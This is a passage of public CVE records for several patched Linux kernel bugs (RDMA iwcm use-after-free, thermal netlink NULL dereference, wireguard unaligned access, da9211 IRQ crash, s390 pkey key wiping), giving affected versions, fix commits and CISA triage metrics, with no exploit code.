rdma_destroy_id() frees both the cm_id and the struct rdma_id_private. Make
sure that cm_work_handler() does not trigger a use-after-free by only
freeing of the struct rdma_id_private after all pending work has finished.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 59c68ac31e15ad09d2cb04734e3c8c544a95f8d4 Version: 59c68ac31e15ad09d2cb04734e3c8c544a95f8d4 Version: 59c68ac31e15ad09d2cb04734e3c8c544a95f8d4 Version: 59c68ac31e15ad09d2cb04734e3c8c544a95f8d4 Version: 59c68ac31e15ad09d2cb04734e3c8c544a95f8d4 Version: 59c68ac31e15ad09d2cb04734e3c8c544a95f8d4 Version: 59c68ac31e15ad09d2cb04734e3c8c544a95f8d4 Version: 59c68ac31e15ad09d2cb04734e3c8c544a95f8d4 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42285",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:11:23.465400Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:30.490Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/core/iwcm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d91d253c87fd1efece521ff2612078a35af673c6",
"status": "affected",
"version": "59c68ac31e15ad09d2cb04734e3c8c544a95f8d4",
"versionType": "git"
},
{
"lessThan": "7f25f296fc9bd0435be14e89bf657cd615a23574",
"status": "affected",
"version": "59c68ac31e15ad09d2cb04734e3c8c544a95f8d4",
"versionType": "git"
},
{
"lessThan": "94ee7ff99b87435ec63211f632918dc7f44dac79",
"status": "affected",
"version": "59c68ac31e15ad09d2cb04734e3c8c544a95f8d4",
"versionType": "git"
},
{
"lessThan": "557d035fe88d78dd51664f4dc0e1896c04c97cf6",
"status": "affected",
"version": "59c68ac31e15ad09d2cb04734e3c8c544a95f8d4",
"versionType": "git"
},
{
"lessThan": "dc8074b8901caabb97c2d353abd6b4e7fa5a59a5",
"status": "affected",
"version": "59c68ac31e15ad09d2cb04734e3c8c544a95f8d4",
"versionType": "git"
},
{
"lessThan": "ff5bbbdee08287d75d72e65b72a2b76d9637892a",
"status": "affected",
"version": "59c68ac31e15ad09d2cb04734e3c8c544a95f8d4",
"versionType": "git"
},
{
"lessThan": "ee39384ee787e86e9db4efb843818ef0ea9cb8ae",
"status": "affected",
"version": "59c68ac31e15ad09d2cb04734e3c8c544a95f8d4",
"versionType": "git"
},
{
"lessThan": "aee2424246f9f1dadc33faa78990c1e2eb7826e4",
"status": "affected",
"version": "59c68ac31e15ad09d2cb04734e3c8c544a95f8d4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/core/iwcm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.8"
},
{
"lessThan": "4.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "4.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/iwcm: Fix a use-after-free related to destroying CM IDs\n\niw_conn_req_handler() associates a new struct rdma_id_private (conn_id) with\nan existing struct iw_cm_id (cm_id) as follows:\n\n conn_id-\u003ecm_id.iw = cm_id;\n cm_id-\u003econtext = conn_id;\n cm_id-\u003ecm_handler = cma_iw_handler;\n\nrdma_destroy_id() frees both the cm_id and the struct rdma_id_private. Make\nsure that cm_work_handler() does not trigger a use-after-free by only\nfreeing of the struct rdma_id_private after all pending work has finished."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:25:57.010Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d91d253c87fd1efece521ff2612078a35af673c6"
},
{
"url": "https://git.kernel.org/stable/c/7f25f296fc9bd0435be14e89bf657cd615a23574"
},
{
"url": "https://git.kernel.org/stable/c/94ee7ff99b87435ec63211f632918dc7f44dac79"
},
{
"url": "https://git.kernel.org/stable/c/557d035fe88d78dd51664f4dc0e1896c04c97cf6"
},
{
"url": "https://git.kernel.org/stable/c/dc8074b8901caabb97c2d353abd6b4e7fa5a59a5"
},
{
"url": "https://git.kernel.org/stable/c/ff5bbbdee08287d75d72e65b72a2b76d9637892a"
},
{
"url": "https://git.kernel.org/stable/c/ee39384ee787e86e9db4efb843818ef0ea9cb8ae"
},
{
"url": "https://git.kernel.org/stable/c/aee2424246f9f1dadc33faa78990c1e2eb7826e4"
}
],
"title": "RDMA/iwcm: Fix a use-after-free related to destroying CM IDs",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42285",
"datePublished": "2024-08-17T09:08:51.302Z",
"dateReserved": "2024-07-30T07:40:12.262Z",
"dateUpdated": "2025-05-04T09:25:57.010Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48915 (GCVE-0-2022-48915)
Vulnerability from cvelistv5
Published
2024-08-22 01:32
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
thermal: core: Fix TZ_GET_TRIP NULL pointer dereference
Do not call get_trip_hyst() from thermal_genl_cmd_tz_get_trip() if
the thermal zone does not define one.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48915",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:47.593417Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:01.675Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/thermal/thermal_netlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1c0b51e62a50e9291764d022ed44549e65d6ab9c",
"status": "affected",
"version": "1ce50e7d408ef2bdc8ca021363fd46d1b8bfad00",
"versionType": "git"
},
{
"lessThan": "3dafbf915c05f83469e791949b5590da2aca2afb",
"status": "affected",
"version": "1ce50e7d408ef2bdc8ca021363fd46d1b8bfad00",
"versionType": "git"
},
{
"lessThan": "4c294285cec3964b3291772ac0642c2bf440bd1b",
"status": "affected",
"version": "1ce50e7d408ef2bdc8ca021363fd46d1b8bfad00",
"versionType": "git"
},
{
"lessThan": "5838a14832d447990827d85e90afe17e6fb9c175",
"status": "affected",
"version": "1ce50e7d408ef2bdc8ca021363fd46d1b8bfad00",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/thermal/thermal_netlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.9"
},
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.104",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.104",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nthermal: core: Fix TZ_GET_TRIP NULL pointer dereference\n\nDo not call get_trip_hyst() from thermal_genl_cmd_tz_get_trip() if\nthe thermal zone does not define one."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:01.412Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1c0b51e62a50e9291764d022ed44549e65d6ab9c"
},
{
"url": "https://git.kernel.org/stable/c/3dafbf915c05f83469e791949b5590da2aca2afb"
},
{
"url": "https://git.kernel.org/stable/c/4c294285cec3964b3291772ac0642c2bf440bd1b"
},
{
"url": "https://git.kernel.org/stable/c/5838a14832d447990827d85e90afe17e6fb9c175"
}
],
"title": "thermal: core: Fix TZ_GET_TRIP NULL pointer dereference",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48915",
"datePublished": "2024-08-22T01:32:15.064Z",
"dateReserved": "2024-08-21T06:06:23.294Z",
"dateUpdated": "2025-05-04T08:26:01.412Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42247 (GCVE-0-2024-42247)
Vulnerability from cvelistv5
Published
2024-08-07 15:14
Modified
2025-05-04 09:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wireguard: allowedips: avoid unaligned 64-bit memory accesses
On the parisc platform, the kernel issues kernel warnings because
swap_endian() tries to load a 128-bit IPv6 address from an unaligned
memory location:
Kernel: unaligned access to 0x55f4688c in wg_allowedips_insert_v6+0x2c/0x80 [wireguard] (iir 0xf3010df)
Kernel: unaligned access to 0x55f46884 in wg_allowedips_insert_v6+0x38/0x80 [wireguard] (iir 0xf2010dc)
Avoid such unaligned memory accesses by instead using the
get_unaligned_be64() helper macro.
[Jason: replace src[8] in original patch with src+8]
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42247",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:13:28.429050Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:31.003Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireguard/allowedips.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ae630de24efb123d7199a43256396d7758f4cb75",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "b4764f0ad3d68de8a0b847c05f427afb86dd54e6",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "217978a29c6ceca76d3c640bf94bdf50c268d801",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "6638a203abad35fa636d59ac47bdbc4bc100fd74",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "2fb34bf76431e831f9863cd59adc0bd1f67b0fbf",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "948f991c62a4018fb81d85804eeab3029c6209f8",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireguard/allowedips.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.100",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.41",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.100",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.41",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwireguard: allowedips: avoid unaligned 64-bit memory accesses\n\nOn the parisc platform, the kernel issues kernel warnings because\nswap_endian() tries to load a 128-bit IPv6 address from an unaligned\nmemory location:\n\n Kernel: unaligned access to 0x55f4688c in wg_allowedips_insert_v6+0x2c/0x80 [wireguard] (iir 0xf3010df)\n Kernel: unaligned access to 0x55f46884 in wg_allowedips_insert_v6+0x38/0x80 [wireguard] (iir 0xf2010dc)\n\nAvoid such unaligned memory accesses by instead using the\nget_unaligned_be64() helper macro.\n\n[Jason: replace src[8] in original patch with src+8]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:25:01.360Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ae630de24efb123d7199a43256396d7758f4cb75"
},
{
"url": "https://git.kernel.org/stable/c/b4764f0ad3d68de8a0b847c05f427afb86dd54e6"
},
{
"url": "https://git.kernel.org/stable/c/217978a29c6ceca76d3c640bf94bdf50c268d801"
},
{
"url": "https://git.kernel.org/stable/c/6638a203abad35fa636d59ac47bdbc4bc100fd74"
},
{
"url": "https://git.kernel.org/stable/c/2fb34bf76431e831f9863cd59adc0bd1f67b0fbf"
},
{
"url": "https://git.kernel.org/stable/c/948f991c62a4018fb81d85804eeab3029c6209f8"
}
],
"title": "wireguard: allowedips: avoid unaligned 64-bit memory accesses",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42247",
"datePublished": "2024-08-07T15:14:32.232Z",
"dateReserved": "2024-07-30T07:40:12.254Z",
"dateUpdated": "2025-05-04T09:25:01.360Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48891 (GCVE-0-2022-48891)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
regulator: da9211: Use irq handler when ready
If the system does not come from reset (like when it is kexec()), the
regulator might have an IRQ waiting for us.
If we enable the IRQ handler before its structures are ready, we crash.
This patch fixes:
[ 1.141839] Unable to handle kernel read from unreadable memory at virtual address 0000000000000078
[ 1.316096] Call trace:
[ 1.316101] blocking_notifier_call_chain+0x20/0xa8
[ 1.322757] cpu cpu0: dummy supplies not allowed for exclusive requests
[ 1.327823] regulator_notifier_call_chain+0x1c/0x2c
[ 1.327825] da9211_irq_handler+0x68/0xf8
[ 1.327829] irq_thread+0x11c/0x234
[ 1.327833] kthread+0x13c/0x154
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48891",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:04:22.121781Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:06.401Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/regulator/da9211-regulator.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1c1afcb8839b91c09d211ea304faa269763b1f91",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f75cde714e0a67f73ef169aa50d4ed77d04f7236",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d443308edbfb6e9e757b478af908515110d1efd5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d4aa749e046435f054e94ebf50cad143d6229fae",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "470f6a9175f13a53810734658c35cc5bba33be01",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ad1336274f733a7cb1f87b5c5908165a2c14df53",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "02228f6aa6a64d588bc31e3267d05ff184d772eb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/regulator/da9211-regulator.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.303",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.229",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.164",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.89",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.303",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.270",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.229",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.164",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.89",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nregulator: da9211: Use irq handler when ready\n\nIf the system does not come from reset (like when it is kexec()), the\nregulator might have an IRQ waiting for us.\n\nIf we enable the IRQ handler before its structures are ready, we crash.\n\nThis patch fixes:\n\n[ 1.141839] Unable to handle kernel read from unreadable memory at virtual address 0000000000000078\n[ 1.316096] Call trace:\n[ 1.316101] blocking_notifier_call_chain+0x20/0xa8\n[ 1.322757] cpu cpu0: dummy supplies not allowed for exclusive requests\n[ 1.327823] regulator_notifier_call_chain+0x1c/0x2c\n[ 1.327825] da9211_irq_handler+0x68/0xf8\n[ 1.327829] irq_thread+0x11c/0x234\n[ 1.327833] kthread+0x13c/0x154"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:35.486Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1c1afcb8839b91c09d211ea304faa269763b1f91"
},
{
"url": "https://git.kernel.org/stable/c/f75cde714e0a67f73ef169aa50d4ed77d04f7236"
},
{
"url": "https://git.kernel.org/stable/c/d443308edbfb6e9e757b478af908515110d1efd5"
},
{
"url": "https://git.kernel.org/stable/c/d4aa749e046435f054e94ebf50cad143d6229fae"
},
{
"url": "https://git.kernel.org/stable/c/470f6a9175f13a53810734658c35cc5bba33be01"
},
{
"url": "https://git.kernel.org/stable/c/ad1336274f733a7cb1f87b5c5908165a2c14df53"
},
{
"url": "https://git.kernel.org/stable/c/02228f6aa6a64d588bc31e3267d05ff184d772eb"
}
],
"title": "regulator: da9211: Use irq handler when ready",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48891",
"datePublished": "2024-08-21T06:10:23.318Z",
"dateReserved": "2024-08-21T06:06:23.290Z",
"dateUpdated": "2025-05-04T08:25:35.486Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42155 (GCVE-0-2024-42155)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-05-04 09:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
s390/pkey: Wipe copies of protected- and secure-keys
Although the clear-key of neither protected- nor secure-keys is
accessible, this key material should only be visible to the calling
process. So wipe all copies of protected- or secure-keys from stack,
even in case of an error.
References
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.564Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c746f7ced4ad88ee48d0b6c92710e4674403185b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f2ebdadd85af4f4d0cae1e5d009c70eccc78c207"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42155",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:15:11.881394Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:08.077Z",
